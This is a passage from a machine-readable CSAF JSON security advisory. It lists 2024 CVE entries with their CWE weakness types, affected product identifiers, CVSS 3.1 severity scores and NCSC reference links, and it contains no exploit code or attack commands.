"CSAFPID-1673188"
]
}
],
"title": "CVE-2024-21261"
},
{
"cve": "CVE-2024-22018",
"cwe": {
"id": "CWE-275",
"name": "-"
},
"notes": [
{
"category": "other",
"text": "CWE-275",
"title": "CWE-275"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22018",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22018.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-22018"
},
{
"cve": "CVE-2024-22020",
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22020",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22020.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-22020"
},
{
"cve": "CVE-2024-22201",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673384",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22201",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22201.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673384",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-22201"
},
{
"cve": "CVE-2024-23807",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"notes": [
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650831",
"CSAFPID-1650825",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-23807",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-23807.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1650831",
"CSAFPID-1650825",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-23807"
},
{
"cve": "CVE-2024-23944",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-23944",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-23944.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-23944"
},
{
"cve": "CVE-2024-24989",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-24989",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-24989.json"
}
],
"title": "CVE-2024-24989"
},
{
"cve": "CVE-2024-24990",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"notes": [
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-24990",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-24990.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-24990"
},
{
"cve": "CVE-2024-25710",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"notes": [
{
"category": "other",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1673384",
"CSAFPID-816871",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-342816",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-912046",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-25710",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-25710.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1673384",
"CSAFPID-816871",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-342816",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-912046",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-25710"
},
{
"cve": "CVE-2024-26130",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-26130",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-26130.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-26130"
},
{
"cve": "CVE-2024-26308",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1673384",
"CSAFPID-816871",
"CSAFPID-816798",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-26308",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-26308.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1673384",
"CSAFPID-816871",
"CSAFPID-816798",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-26308"
},
{
"cve": "CVE-2024-27983",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-27983",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-27983.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-27983"
},
{
"cve": "CVE-2024-28182",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Detection of Error Condition Without Action",
"title": "CWE-390"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673442",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-28182",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-28182.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673442",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-28182"
},
{
"cve": "CVE-2024-28849",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-28849",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-28849.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-28849"
},
{
"cve": "CVE-2024-28887",
"cwe": {
"id": "CWE-427",
"name": "Uncontrolled Search Path Element"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Search Path Element",
"title": "CWE-427"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-28887",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-28887.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
}
],
"title": "CVE-2024-28887"
},
{
"cve": "CVE-2024-29025",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673488",
"CSAFPID-1673489",
"CSAFPID-1673491",
"CSAFPID-1673492",
"CSAFPID-1673493",
"CSAFPID-1673495",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29025",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-29025.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1673488",
"CSAFPID-1673489",
"CSAFPID-1673491",
"CSAFPID-1673492",
"CSAFPID-1673493",
"CSAFPID-1673495",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-29025"
},
{
"cve": "CVE-2024-29131",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673497",
"CSAFPID-1673397",
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29131",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-29131.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1673497",
"CSAFPID-1673397",
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-29131"
},
{
"cve": "CVE-2024-29133",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673497",
"CSAFPID-1673397",
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29133",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-29133.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1673497",
"CSAFPID-1673397",
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-29133"
},
{
"cve": "CVE-2024-31079",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-31079",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-31079.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-31079"
},
{
"cve": "CVE-2024-32760",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-32760",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-32760.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-32760"
},
{
"cve": "CVE-2024-34161",
"cwe": {
"id": "CWE-401",
"name": "Missing Release of Memory after Effective Lifetime"
},
"notes": [
{
"category": "other",
"text": "Missing Release of Memory after Effective Lifetime",
"title": "CWE-401"
},
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-34161",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-34161.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-34161"
},
{
"cve": "CVE-2024-34750",
"cwe": {
"id": "CWE-755",
"name": "Improper Handling of Exceptional Conditions"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Exceptional Conditions",
"title": "CWE-755"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673504",
"CSAFPID-1673506"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-34750",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-34750.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673504",
"CSAFPID-1673506"
]
}
],
"title": "CVE-2024-34750"
},
{
"cve": "CVE-2024-35200",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-35200",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-35200.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-35200"
},
{
"cve": "CVE-2024-36137",
"cwe": {
"id": "CWE-275",
"name": "-"
},
"notes": [
{
"category": "other",
"text": "CWE-275",
"title": "CWE-275"
},
{
"category": "other",
"text": "Incorrect Permission Assignment for Critical Resource",
"title": "CWE-732"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-36137",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-36137.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2024-36137"
},
{
"cve": "CVE-2024-36138",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"title": "CWE-77"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-36138",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-36138.json"
}
],
"title": "CVE-2024-36138"
},
{
"cve": "CVE-2024-36387",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-36387",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-36387.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
